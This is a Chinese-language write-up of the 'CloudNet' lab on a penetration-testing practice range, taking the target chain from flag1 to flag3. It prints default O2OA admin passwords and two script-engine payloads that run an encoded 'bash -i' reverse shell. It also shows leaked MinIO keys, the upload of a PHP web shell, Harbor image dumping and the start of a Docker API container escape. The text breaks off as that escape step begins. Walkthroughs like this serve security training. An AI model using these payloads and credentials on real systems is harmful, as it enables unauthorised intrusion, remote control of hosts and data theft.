{"id":1063,"date":"2025-05-31T18:11:40","date_gmt":"2025-05-31T10:11:40","guid":{"rendered":"https:\/\/www.s1mh0.cn\/blog\/?p=1063"},"modified":"2025-06-03T22:41:41","modified_gmt":"2025-06-03T14:41:41","slug":"cqyj_cloudnet","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2025\/05\/31\/cqyj_cloudnet\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-Cloudnet"},"content":{"rendered":"

CloudNet<\/h2>\n

\u6700\u8be6\u7ec6\u7684\u4e00\u96c6\uff09<\/p>\n

\u6d89\u53ca\u7684\u77e5\u8bc6\u70b9<\/p>\n

O2OA \u9ed8\u8ba4\u8d26\u5bc6+\u540e\u53f0RCE\nminio\u6570\u636e\u540c\u6b65RCE\nMinio SSRF + 2375\u7aef\u53e3docker_api\u5bb9\u5668\u6302\u8f7d\u9003\u9038\n\u6781\u81f4cms(ThinkPHP)\u591a\u8bed\u8a00\u6a21\u5757\u6587\u4ef6\u5305\u542bRCE\n\u9ed8\u8ba4\u8def\u5f84\u83b7\u53d6Kubernetes SA_token\nKubernetes\u5bb9\u5668\u6302\u8f7d\u9003\u9038\nHarbor\u955c\u50cf\u540c\u6b65\nDocker privileged\u63d0\u6743<\/code><\/pre>\n
flag1<\/h3>\n
fscan\u626b\u5230\u4e24\u4e2aweb\u670d\u52a1\uff0c8080\u7aef\u53e3\u4e00\u8fdb\u53bb\u5c31\u662fO2oa\u7684\u540e\u53f0\u767b\u5f55\u754c\u9762<\/p>\n
start infoscan\n39.98.124.136:22 open\n39.98.124.136:80 open\n39.98.124.136:8080 open\n[*] alive ports len is: 3\nstart vulscan\n[*] WebTitle http:\/\/39.98.124.136      code:200 len:12592  title:\u5e7f\u57ce\u5e02\u4eba\u6c11\u533b\u9662\n[*] WebTitle http:\/\/39.98.124.136:8080 code:200 len:282    title:None<\/code><\/pre>\n
O2 oa\u540e\u53f0RCE<\/h4>\n
\"cloudnet_1\"<\/p>\n
O2oa \u9ed8\u8ba4\u8d26\u5bc6 xadmin\/o2<\/code>\u6216xadmin\/o2oa@2022<\/code><\/p>\n
\u7528\u540e\u8005\u767b\u5f55\u8fdb\u53bb\uff0c\u5728\u5e94\u7528\u2014\u2014\u670d\u52a1\u7ba1\u7406\u2014\u2014\u4ee3\u7406\u914d\u7f6e \u6216 \u63a5\u53e3\u914d\u7f6e<\/code>\u65b0\u5efa\u4e00\u4e2a\u4ee3\u7406 \u6216 \u63a5\u53e3<\/p>\n
\u6839\u636egithub\u4e0a\u7684issue<\/a>\uff0c\u5229\u7528\u8be5issue\u7684exp\u65e0\u6cd5\u6253\u901a\uff0c\u6309\u4f5c\u8005\u7684\u610f\u601d\u5e94\u8be5\u53ea\u662f\u8fc7\u6ee4\u4e86java.lang.Class<\/code>\u7c7b\uff0c\u6362\u4e00\u4e2a\u6838\u5fc3\u7c7b\u5373\u53ef<\/p>\n
var a = mainOutput(); \nfunction mainOutput() {\n    var classLoader = Java.type("java.lang.ClassLoader");\n    var systemClassLoader = classLoader.getSystemClassLoader();\n    var runtimeMethod = systemClassLoader.loadClass("java.lang.Runtime");\n    var getRuntime = runtimeMethod.getDeclaredMethod("getRuntime");\n    var runtime = getRuntime.invoke(null);\n    var exec = runtimeMethod.getDeclaredMethod("exec", Java.type("java.lang.String"));\n    exec.invoke(runtime, "bash -c {echo,YmFz...MQ==}|{base64,-d}|{bash,-i}");\n}<\/code><\/pre>\n
var a = mainOutput();\nfunction mainOutput() {\n    var threadClazz = Java.type("java.lang.Thread");\n    var classLoader = threadClazz.currentThread().getContextClassLoader();\n    var rtClazz = classLoader.loadClass("java.lang.Runtime");\n    var stringClazz = classLoader.loadClass("java.lang.String");\n    var getRuntimeMethod = rtClazz.getMethod("getRuntime");\n    var execMethod = rtClazz.getMethod("exec", stringClazz);\n    var runtimeObj = getRuntimeMethod.invoke(rtClazz);\n    return execMethod.invoke(runtimeObj, "bash -c {echo,YmFza...MQ==}|{base64,-d}|{bash,-i}");\n}<\/code><\/pre>\n
\u5199\u597d\u540e\u6309ctrl+s\u4fdd\u5b58\uff0c\u7528\u4ee3\u7406\u8bb0\u5f97\u586b\u5199cron\u8868\u8fbe\u5f0f\uff0c\u7528\u63a5\u53e3\u8bb0\u5f97\u53d6\u6d88\u9274\u6743<\/p>\n
\"cloudnet_2\"<\/p>\n
vps\u76d1\u542c\u4e0a\u7ebf\u62ff\u7b2c\u4e00\u4e2aflag\uff0c\u8fd9\u91cc\u56e0\u4e3a\u6ca1\u6709curl\u547d\u4ee4\u3001wget\u4e00\u952e\u4e0a\u7ebf\u4e5f\u5931\u8d25\u4e86\uff0c\u6240\u4ee5\u7528pwncat\u76d1\u542c\u5e76\u4e0a\u4f20\u53cd\u5411\u9a6c\u4e0a\u7ebf<\/p>\n
\"cloudnet_3\"<\/p>\n
flag2<\/h3>\n
\u9776\u673a\u6d4b\u4e86\u4e0b\u53d1\u73b0\u662f\u53f0docker\u5bb9\u5668<\/p>\n
cat \/proc\/1\/cgroup | grep -i docker<\/code><\/pre>\n
\"cloudnet_4\"<\/p>\n
minio\u6570\u636e\u540c\u6b65RCE<\/h4>\n
\u63a5\u7740\u56de\u5e73\u53f0\uff0c\u5728\u7cfb\u7edf\u914d\u7f6e-json\u914d\u7f6e-externalStorageSources (\u6587\u4ef6\u5b58\u50a8\u914d\u7f6e)<\/code>\u770b\u5230minio\u7684ak-sk\u4ee5\u53caip\u7aef\u53e3<\/p>\n
\"cloudnet_5\"<\/p>\n
"store": {\n    "minio": {\n        "protocol": "min",\n        "username": "bxBZOXDlizzuujdR",\n        "password": "TGdtqwJbBrEMhCCMDVtlHKU=",\n        "host": "172.22.18.29",\n        "port": 9000,\n        "name": "o2oa"\n    }\n},<\/code><\/pre>\n
\u642d\u597d\u4ee3\u7406\u8bbf\u95eeminio\uff0c\u767b\u5f55\u540e\u53d1\u73b0\u9664\u4e86o2oa\uff0c\u8fd8\u6709\u4e2aportal\u7ad9\uff0c\u6d4b\u8bd5\u53d1\u73b0\u91cc\u9762\u7684\u7f51\u7ad9\u7ed3\u6784\u8ddf\u5165\u53e3\u673a80\u7aef\u53e3\u7684web\u670d\u52a1\u662f\u4e00\u6837\u7684\uff0c\u4e0a\u4f20php\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u7b49\u5f85minio\u8ddf\u5165\u53e3\u673a\u8fdb\u884c\u6570\u636e\u540c\u6b65\uff08\u6bcf\u5341\u5206\u949f\uff09<\/p>\n
\"cloudnet_6\"<\/p>\n
\u5165\u53e3\u673a\u62ff\u5230\u7b2c\u4e8c\u4e2aflag<\/p>\n
\"cloudnet_7\"<\/p>\n
flag3<\/h3>\n
\u4e00\u53e5\u8bdd\u4e0a\u7ebf\uff0c\u626b\u5185\u7f51<\/p>\n
start infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 172.22.18.23    is alive\n(icmp) Target 172.22.18.29    is alive\n(icmp) Target 172.22.18.64    is alive\n(icmp) Target 172.22.18.61    is alive\n[*] Icmp alive hosts len is: 4\n172.22.18.29:9000 open\n172.22.18.23:8080 open\n172.22.18.61:80 open\n172.22.18.64:80 open\n172.22.18.61:22 open\n172.22.18.64:22 open\n172.22.18.29:22 open\n172.22.18.23:80 open\n172.22.18.23:22 open\n172.22.18.61:10250 open\n[*] alive ports len is: 10\nstart vulscan\n[*] WebTitle http:\/\/172.22.18.23       code:200 len:12592  title:\u5e7f\u57ce\u5e02\u4eba\u6c11\u533b\u9662\n[*] WebTitle http:\/\/172.22.18.64       code:200 len:785    title:Harbor\n[+] InfoScan http:\/\/172.22.18.64       [Harbor] \n[*] WebTitle http:\/\/172.22.18.23:8080  code:200 len:282    title:None\n[*] WebTitle http:\/\/172.22.18.29:9000  code:307 len:43     title:None \u8df3\u8f6curl: http:\/\/172.22.18.29:9000\/minio\/\n[*] WebTitle http:\/\/172.22.18.61       code:200 len:8710   title:\u533b\u9662\u5185\u90e8\u5e73\u53f0\n[*] WebTitle https:\/\/172.22.18.61:10250 code:404 len:19     title:None\n[*] WebTitle http:\/\/172.22.18.29:9000\/minio\/ code:200 len:2281   title:MinIO Browser\n[+] PocScan http:\/\/172.22.18.64\/swagger.json poc-yaml-swagger-ui-unauth [{path swagger.json}]<\/code><\/pre>\n
\u626b\u5230Harbor\uff0c\u53ef\u4ee5\u76f4\u63a5\u4e0a\u5de5\u5177<\/a>\u4e0b\u8f7ddocker\u5bb9\u5668\u6587\u4ef6<\/p>\n
python3 harbor.py http:\/\/172.22.18.64\npython3 harbor.py http:\/\/172.22.18.64\/  --dump public\/mysql --v2<\/code><\/pre>\n
\u4e5f\u53ef\u4ee5\u76f4\u63a5docker pull\u62c9\u955c\u50cf\uff0c\u8fd9\u91cc\u9664\u4e86\u7ed9dockerd<\/code>\u8bbe\u7f6e HTTP\/HTTPS \u4ee3\u7406\uff0c\u4e5f\u53ef\u4ee5\u7528\u72d7\u54e5\u535a\u5ba2\u90a3\u7bc7\u65b9\u6cd5\u76f4\u63a5\u5728linux\u7528clash\u505a\u5168\u5c40\u4ee3\u7406\uff0c\u6211\u8bd5\u4e86\u8fd9\u4e24\u79cd\u65b9\u6cd5\u90fd\u53ef\u4ee5<\/p>\n
dockerd \u8bbe\u7f6e HTTP\/HTTPS \u4ee3\u7406<\/strong><\/p>\n
\u5728\/etc\/systemd\/system\/docker.service.d\/http-proxy.conf<\/code>\u6dfb\u52a0<\/p>\n
[Service]\nEnvironment="HTTP_PROXY=socks5:\/\/8.138.89.236:10086\/"<\/code><\/pre>\n
Clash \u8bbe\u7f6e\u4ee3\u7406<\/strong><\/p>\n
config.yaml<\/p>\n
mixed-port: 7890\nallow-lan: false\nexternal-controller: 127.0.0.1:42449\nsecret: xxx\nproxies:\n    - {name: 'SocksTest', type: socks5, server: socksip, port: socksport}<\/code><\/pre>\n
\u5982\u679c\u62c9\u53d6\u5931\u8d25\uff0c\u9700\u8981\u5728\/etc\/docker\/daemon.json<\/code>\u6dfb\u52a0insecure-registries<\/code>\u5b57\u6bb5\uff0c\u5141\u8bb8 Docker \u4e0e\u6307\u5b9a\u7684\u975e HTTPS \u79c1\u6709\u955c\u50cf\u4ed3\u5e93\uff08IP \u4e3a 172.22.18.64\uff09\u8fdb\u884c\u901a\u4fe1<\/p>\n
{\n  "insecure-registries": ["172.22.18.64"]\n}<\/code><\/pre>\n
\u914d\u7f6e\u540e\u91cd\u542f\u670d\u52a1<\/p>\n
systemctl daemon-reload\nsystemctl restart docker<\/code><\/pre>\n
\u62c9\u53d6\u955c\u50cf\u4e4b\u540e\u521b\u5efa\u5bb9\u5668\uff0c\u4f46\u662f\u91cc\u9762\u6ca1\u4ec0\u4e48\u4e1c\u897f<\/p>\n
docker pull 172.22.18.64\/public\/mysql:5.6\ndocker run -itd --name cloud 172.22.18.64\/public\/mysql:5.6<\/code><\/pre>\n
\"cloudnet_8\"<\/p>\n
minio SSRF + 2375\u7aef\u53e3docker api\u5bb9\u5668\u6302\u8f7d\u9003\u9038<\/h4>\n
\u90a3\u5c31\u5b66\u5927\u5934\u5e08\u5085\u8ddf\u6587\u7ae0<\/a>\u6253minio SSRF + 2375\u7aef\u53e3docker api\uff0c\u521b\u5efa\u6076\u610f\u5bb9\u5668\u6302\u8f7d\u9003\u9038<\/p>\n
\u56e0\u4e3a\u524d\u9762\u8fdb\u53bbmysql\u5bb9\u5668\u53d1\u73b0\u6ca1\u6709curl\u548cwget\u547d\u4ee4\uff0c\u56e0\u6b64\u7528exec\u6765\u53d1\u9001\u8bf7\u6c42\u5305\uff0c\u901a\u8fc7\u4e0e 2375\u7aef\u53e3\u7684 Docker Daemon API \u4ea4\u4e92\uff0c\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u521b\u5efa\u5e76\u542f\u52a8\u4e00\u4e2a\u5bb9\u5668\uff0c\u5e76\u5728\u5176\u4e2d\u6267\u884c\u4e00\u4e2a\u53cd\u5411 shell \u547d\u4ee4\uff0c\u4e00\u5171\u56db\u4e2a\u5305\uff1a<\/p>\n